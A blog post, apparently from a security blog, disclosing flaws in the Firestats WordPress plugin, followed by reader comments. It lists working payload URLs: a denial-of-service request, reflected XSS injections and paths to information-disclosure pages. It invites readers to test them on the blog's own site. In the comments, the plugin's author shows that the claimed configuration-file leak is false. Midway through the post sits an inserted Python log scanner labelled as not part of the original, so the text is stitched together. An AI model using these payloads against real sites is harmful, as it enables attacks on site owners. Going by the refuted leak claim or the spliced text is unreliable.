More 0day wordpress security leaks in firestats!

I just tried to find more security leaks in the Firestats plugin; I was specifically searching for remotely exploitable problems.

The result is 7 fresh security issues.

1x DoS:

/wp-content/plugins/firestats/bridge.php?file_id=reset_password&show=1

1x remotely downloadable configuration file; this may contain the database information (username, password, name, prefix, host).

/wp-content/plugins/firestats/php/tools/get_config.php

2x Information disclosure:

/wp-content/plugins/firestats/php/page-sites.php
/wp-content/plugins/firestats/php/page-tools.php

3x XSS:

/wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E

/wp-content/plugins/firestats/php/window-add-excluded-url.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E

/wp-content/plugins/firestats/php/window-new-edit-site.php?site_id=%27%20onmousemove=alert%28123%29;%20style=width:900;height:900;%20a=<
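As an added example (not code from the original post or from the Firestats project), a defender-side log check for the requests listed above: it parses constructed Apache-style access-log lines and flags requests under the plugin path whose decoded query values carry a tag or a quote-then-on* handler (the two XSS shapes shown), or the bridge.php reset_password request. The log lines, timestamps and IP addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2010:10:00:00 +0000] "GET /wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2010:10:00:01 +0000] "GET /wp-content/plugins/firestats/php/window-new-edit-site.php?site_id=%27%20onmousemove=alert%28123%29;%20style=width:900;height:900;%20a=< HTTP/1.1" 200 611 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2010:10:00:02 +0000] "GET /wp-content/plugins/firestats/bridge.php?file_id=reset_password&show=1 HTTP/1.1" 200 64 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2010:10:00:03 +0000] "GET /wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=192.0.2.1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2010:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Combined-format request line: client IP, timestamp, method and request target.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)
PLUGIN_PREFIX = "/wp-content/plugins/firestats/"
# An opening/closing tag in a decoded value (the <script> payload shape).
TAG_RE = re.compile(r"<\s*/?\s*[a-z]", re.I)
# A quote closing an attribute followed by an on* event handler (the site_id payload shape).
ATTR_BREAK_RE = re.compile(r"""['"][^'"]*\bon[a-z]+\s*=""", re.I)

def classify(target):
    """Return a finding label for one request target under the plugin path, else None."""
    parts = urlsplit(target)
    if not parts.path.startswith(PLUGIN_PREFIX):
        return None
    # parse_qsl percent-decodes values, so encoded payloads are inspected in clear form.
    params = parse_qsl(parts.query, keep_blank_values=True)
    if parts.path.endswith("/bridge.php") and dict(params).get("file_id") == "reset_password":
        return "dos-probe"
    for _, value in params:
        if TAG_RE.search(value) or ATTR_BREAK_RE.search(value):
            return "xss-probe"
    return None

def scan_log(text):
    """Return (ip, path, label) for every log line matching one of the probe patterns."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        label = classify(m.group("target"))
        if label:
            findings.append((m.group("ip"), urlsplit(m.group("target")).path, label))
    return findings
```

Benign use of the same endpoints (the plain IP value on the fourth line) is not flagged, so the check can run as-is over a site's access log.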

Let's hope they patch soon, because we are running Firestats too; the previous fix came very fast, so I assume they will fix it quickly this time as well.
Oh and feel free to test the exploits against this site (but don't try out the DoS please).

Good luck Firestats team with fixing these vulnerabilities!

Hello, I am Jelmer, born in 1991. I have been playing in IT security for over half my age; I am not sure when, how and why it started, but I like it. I met Fredrik and Mathias through the internet. This is my Twitter account, feel free to follow me. You can contact me via email jelmerdehen [ at ] hotmail [d0t] com, or you can chat with me in the IRC.

8 Comments

  1. Sid3^effects says:

    nice find.. hope they fix it soon :)

  2. Omry Yadan says:

    The most significant thing is of course the configuration file download, however it's totally false.

    see if you can get my config file from here:

    http://admin.firestats.cc/firestats/php/tools/get_config.php

    This PHP script is designed to generate a config file on demand, not to give the current one.
    for instance, here is the config file of Bill Gates:
    http://admin.firestats.cc/firestats/php/tools/get_config.php?user=Bill%20Gates&pass=secret!

  3. Jelmer de Hen says:

    You are right; I looked at the code but I could not find anything worthy.
    Why would you have this function in Firestats, it's pretty pointless I think.

  4. Omry Yadan says:

    I am sure you can figure it out, if not - look at the comment in the new version of the file ;)

  5. cryptsol says:

    it was very interesting to read.
    I want to quote your post in my blog. It can?
    And you get an account on Twitter?

  6. Jelmer de Hen says:

    Yea you may quote our blog, my personal twitter is http://twitter.com/JelmerDeHen and for the entire blog where you automatically get updates as we update the site is http://twitter.com/HackAck. Feel free to follow us :) .

  7. tava tea says:

    I love what you men are usually up too. This kind of clever work and reporting! Keep up the great functions guys I've added you men to my blogroll, Cheers.

  8. eat thai says:

    Please. can you PM me and tell me company of much more thinks hither this. I am truly fan of inseparable's webpage...gets solved properly asap.
